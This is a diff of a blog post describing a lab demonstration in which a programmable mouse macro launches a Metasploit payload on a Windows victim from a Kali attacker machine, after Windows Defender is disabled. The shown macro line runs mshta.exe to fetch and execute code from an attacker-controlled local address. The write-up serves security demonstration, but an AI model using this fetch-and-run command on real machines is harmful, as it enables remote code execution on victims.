oneinctrl/oneinctrl.github.io/_posts/mousehack/2024-03-20-mousehack.md

 We will use a fairly short payload using a well known exploit in Metasploit.
 As you will see it gets caught by Windows Defender and is not executed.
 For demonstration purposes we will disable Windows Defender and repeat the demo.

 We are using two machines in a local network - the victim Windows machine and an attacker Kali machine.

-We are setting our macro to:
+We set our macro to:

 {% highlight cmd %}
 WIN+R mshta.exe http://192.168.56.102:8080/